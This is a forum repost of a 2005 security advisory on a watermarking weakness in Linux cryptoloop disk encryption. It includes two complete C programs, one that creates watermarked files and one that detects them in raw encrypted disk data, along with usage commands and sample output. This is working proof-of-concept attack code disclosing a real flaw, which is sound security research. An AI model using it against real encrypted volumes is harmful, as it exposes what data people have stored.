Forums: Linux Cryptoloop Watermark Exploit - Forums

Jump to content

Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

Linux Cryptoloop Watermark Exploit

#1 User is offline   qcred11 

  • Master Sergeant
  • Icon
  • Group: Second Lieutenant
  • Posts: 2,533
  • Joined: 25-February 04

Posted 27 May 2005 - 05:18 AM

Quote

Linux Cryptoloop Watermark Exploit

SUMMARY

Cryptoloop "makes it possible to create encrypted file systems within a
partition or another file in the file system. These encrypted files can
the be moved to a CD, DVD, USB memory stick, etc. Cryptoloop makes use of
the loop device. This device is a pseudo-device which serves as a 'loop'
through which each call to a the file system has to pass. This way, data
can be processed in order to encrypt and decrypt it".

Cryptoloop is vulnerable to watermarking, making it possible to determine
presence of watermarked data on the encrypted filesystem.

DETAILS

This attack exploits weakness in IV computation and knowledge of how file
systems place files on disk. This attack works with file systems that have
soft block size of 1024 or greater. At least ext2, ext3, reiserfs and
minix have such property. This attack makes it possible to detect presence
of specially crafted watermarked files, such as, unreleased Hollywood
movies, cruise missile service manuals, and other content that you did not
create yourself. Watermarked files contain special bit patterns that can
be detected without decryption.

For example, to encode author's first name Jari as watermark, we should
use ASCII characters 74 97 114 105. This example uses encodings 10...13.

    # mount -t ext2 /dev/fd0 /mnt -o loop=/dev/loop0,encryption=AES128
    Password:
    # ./create-watermark-encodings 10:74 11:97 12:114 13:105
>/mnt/watermarks
    # umount /mnt

And then to detect these watermarks:
    # dd if=/dev/fd0 bs=64k | ./detect-watermark-encodings
    22+1 records in
    22+1 records out
    1474560 bytes scanned
    watermark encoding 10, count 74
    watermark encoding 11, count 97
    watermark encoding 12, count 114
    watermark encoding 13, count 105


Linux Cryptoloop Watermark Exploit - create watermark 

/*
 * create-watermark-encodings.c
 *
 * Written by Jari Ruusu, February 10 2004
 *
 * Copyright 2004 by Jari Ruusu.
 * Redistribution of this file is permitted under the GNU GPL
 *
 * Usage:
 * ./create-watermark-encodings encoding:count [encoding:count]... >filename
 *
 * Where encoding is a value in range 1...32 and count is number of
 * encodings to write. Watermark encoded file contents are written to
 * standard output. Each encoding takes up 1024 bytes of disk space.
 *
 * Example:
 * ./create-watermark-encodings 5:123 19:17 23:2 >/home/foo/watermarks
 *
 * Credits: Markku-Juhani O. Saarinen discovered this exploit.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

unsigned char buf[1024];
char *progName;

void encodeOne(int encoding)
{
    memset(buf, 0, sizeof(buf));
    buf[512] = 1;
    if(encoding < 1) encoding = 1;
    if(encoding < 32) {
        buf[512 + (encoding * 16)] = 1;
    }
}

void writeOne(void)
{
    if(fwrite(buf, 1024, 1, stdout) != 1) {
        perror("write failed");
        exit(1);
    }
}

int main(int argc, char **argv)
{
    int encoding, y = 0;
    unsigned long count, x;

    progName = *argv;
    if(argc < 2) {
        usage:
        fprintf(stderr, "usage: %s encoding:count [encoding:count]... >filename\n", progName);
        exit(1);
    }
    while(--argc > 0) {
        if(sscanf(*++argv, "%d:%lu", &encoding, &count) != 2) {
            goto usage;
        }
        for(x = 0; x < count; x++) {
            encodeOne(encoding);
            writeOne();
            y++;
        }
    }
    /* make file size multiple of 4K (to avoid fs tail packing) */
    while(y & 3) {
        memset(buf, 0, sizeof(buf));
        writeOne();
        y++;
    }
    if(fflush(stdout)) {
        perror("write failed");
        exit(1);
    }
    exit(0);
}


Linux Cryptoloop Watermark Exploit - detect watermark

/*
 * detect-watermark-encodings.c
 *
 * Written by Jari Ruusu, February 10 2004
 *
 * Copyright 2004 by Jari Ruusu.
 * Redistribution of this file is permitted under the GNU GPL
 *
 * Usage:
 * dd if=/dev/hda999 bs=64k | ./detect-watermark-encodings
 *
 * Program reads encrypted data from standard input and writes human
 * readable summary of detected watermark encodings to standard output.
 *
 * Credits: Markku-Juhani O. Saarinen discovered this exploit.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

unsigned long found[32];
unsigned char buf[1024];
unsigned long long bytes = 0;

int main(int argc, char **argv)
{
    int x, y;

    memset(found, 0, sizeof(found));
    do {
        if(fread(buf, 1024, 1, stdin) != 1) break;
        bytes += 1024;
        y = 0;
        do {
            /* no encoding if ciphertexts do not match */
            if(memcmp(&buf[y] , &buf[y + 512], 16)) break;
            /* if ciphertext is same repeated byte, assume */
            /* that block was newer written with ciphertext */
            for(x = 1; x < 16; x++) {
                if(buf[y + x] != buf[y]) break;
            }
            if(x == 16) break;
            /* found watermark encoding */
            y += 16;
        } while(y < 512);
        if(y) {
            found[(y >> 4) - 1] += 1;
 }
    } while(1);
    printf("%llu bytes scanned\n", bytes);
    y = 1;
    for(x = 0; x < 32; x++) {
        if(found[x]) {
            printf("watermark encoding %d, count %lu\n", x + 1, found[x]);
            y = 0;
        }
    }
    if(y) {
        printf("no watermark encodings found\n");
    }
    exit(0);
}


Link is unavailable
0
Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

1 User(s) are reading this topic
0 members, 1 guests, 0 anonymous users

  • Share



Our Sponsors:


SwiftLayer Affiliate Web Hosting